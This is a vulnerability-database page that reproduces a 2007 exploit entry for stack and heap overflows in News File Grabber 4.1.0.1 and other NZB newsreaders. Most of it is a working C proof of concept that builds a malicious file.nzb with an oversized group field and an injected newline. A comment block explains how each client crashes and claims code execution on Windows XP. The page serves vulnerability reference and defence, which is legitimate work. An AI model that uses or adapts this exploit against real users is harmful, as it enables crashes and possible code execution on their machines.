Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

News File Grabber 4.1.0.1 Subject Line Stack Buffer Overflow Vulnerability (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 14 Views

News File Grabber 4.1.0.1 remote stack-based buffer-overflow vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/22617/info
 
News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
 
Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.
 
This issue affects version 4.1.0.1; other versions may also be affected. 

/*********************************************************************************************\
*                                                                            
                  *
*			                   NZB Generic 0Day DoS Exploit                          
          *
*    Proofs of Concept for News File Grabber, NewsBin, Grabit, NewsReactor 
and News Rover     *
*                                                                            
                  *
*                                                                            
                  *
* Bugs in News Rover <=12.1 Rev 1:                                           
                  *
* There's a stack overflow in RoverNZB triggered by files that contains a 
long subject.       *
* There's a stack overflow in NewsRover triggered by files that contains a 
long group.        *
* To trigger: run file.nzb                                                   
                  *
* Impact: Code execution on Windows XP, SP1 and SP2                          
                  *
*                                                                            
                  *
* Bug in News File Grabber 4.1.0.1:                                          
                  *
* If the subject field contains a new line, the app will try to exec data in 
memory. But      *
* since the address changed every time the app runs it's very hard to 
exploit. However I      *
* sometimes got EIP overwritten by my chars                                  
                  *
* To trigger: load file.nzb and start download. CPU -> 100% and then Out of 
Memory error.     *
* Impact: Code execution on Windows XP, SP1 and SP2                          
                  *
*                                                                            
                  *
* Bug in Grabit 1.5.3:                                                       
                  *
* Grabit does not correctly handle fields that contains a semicolon.         
                  *
* To trigger: Just grab the file                                             
                  *
* Impact: DoS                                                                
                  *
* Note: Grabit 1.6 is not affected.                                          
                  *
*                                                                            
                  *
* Bug in NewsReactor:                                                        
                  *
* There's a heap overflow that occurs when group field is too long.          
                  *
* To trigger: load file.nzb, click grab. After a few tries to get the file 
it crashes.        *
* Impact: Code execution on Windows XP, SP1 and DoS on SP2                   
                  *
*                                                                            
                  *
* Bug in NewsBin Pro 4.3.2:                                                  
                  *
* There's a heap overflow that occurs when group field is too long.          
                  *
* To trigger: load file.nzb, and start download. The app should then be 
unstable.             *
* Impact: Code execution on Windows XP, SP1 and DoS on SP2                   
                  *
*                                                                            
                  *
* Bug in NewsBin Pro 5.33 (maybe others...):                                 
                  *
* There's a heap overflow that occurs when group field is too long.          
                  *
* To trigger: load file.nzb, and start download. Then click "Delete All 
Posts". Boom!         *
* Impact: Code execution on Windows XP, SP1 and DoS on SP2                   
                  *
* Note: Maybe it's possible to exec code on SP2, but there is a lot of bad 
chars and with the *
* stack protection I didn't find a way to jump to a good return address.     
                  *
*                                                                            
                  *
* Solution: Buy your dvds leecha!!!                                          
                  *
*                                                                            
                  *
*                                                                            
                  *
* Coded and discovered by Marsu <[email protected]>                 
                  *
* Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P         
                  *
\*********************************************************************************************/

#include "stdlib.h"
#include "stdio.h"
#include "string.h"

char nzbheader[]="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n"
				 "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" 
\"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n"
				 "<!-- NZB Generated by MarsupilamiPowa -->\n"
				 "<nzb xmlns=\"[email protected]\">\n\n";


char nzbend[]="</segment>\n"
              "</segments>\n"
              "</file>\n"
              "</nzb>\n";



int main(int argc, char* argv[]) {

FILE *file;
char * pad;

printf("MarsupilamiPowa's Generic NZB DoS Exploit\n");

file=fopen("file.nzb","wb");

fprintf(file,nzbheader);
fprintf(file,"<file poster=\"Marsu\n");
fprintf(file,"\" date=\"1170609233\"\nsubject=\"hello bug");
fprintf(file,"\">\n");
fprintf(file,"<groups><group>");

pad = (char*)malloc(sizeof(char)*3000);
memset(pad,'A',3000);
fprintf(file,pad);
fprintf(file,"</group></groups>\n<segments>\n<segment bytes=\"30\" 
number=\"1\">");
fprintf(file,"\n;\n");
fprintf(file,nzbend);
fclose(file);

printf("file.nzb generated! Have fun\n");
return 0;

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
news file grabberremote vulnerabilitystack-based buffer-overflowversion 4.1.0.1arbitrary machine code
14